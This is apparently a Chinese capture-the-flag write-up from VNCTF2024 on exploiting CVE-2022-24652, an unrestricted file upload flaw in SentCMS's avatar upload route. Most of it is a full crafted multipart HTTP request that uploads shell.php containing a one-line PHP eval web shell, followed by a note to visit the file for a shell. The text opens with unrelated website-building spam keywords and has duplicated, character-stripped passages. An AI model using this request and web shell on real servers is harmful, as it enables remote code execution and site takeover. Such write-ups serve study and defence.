东莞市官网网站建设哪家好,网站开发公司对比,做室内设计的网站有哪些方面,建设厅网站总经济师是干什么的CVE-2022-24652
开题 后台管理是thinkphp的#xff0c;但是工具没检测出漏洞。 登陆后界面如下#xff0c;上传头像功能值得引起注意 这其实就是CVE-2022-24652#xff0c;危险类型文件的不加限制上传#xff0c;是文件上传漏洞。漏洞路由/user/upload/upload
参考文章但是工具没检测出漏洞。 登陆后界面如下上传头像功能值得引起注意 这其实就是CVE-2022-24652危险类型文件的不加限制上传是文件上传漏洞。漏洞路由/user/upload/upload
参考文章
阿里云漏洞库 (aliyun.com)
CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库
Sentcms任意文件上传漏洞 | Hanayuzu’Blog 抓包上传文件由于没有上传文件按钮我们手动构建上传包。
修改包
POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9
Cookie: PHPSESSIDbdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; nameidWU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namenametest.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; nametypeimage/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namelastModifiedDateWed Jul 21 2021 18:15:25 GMT0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namesize164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namefile; filenameshell.php
Content-Type: image/jpegJay17
?php eval($_POST[1]);?------WebKitFormBoundaryrhx2kYAMYDqoTThz-- 访问呢恶意文件getshell
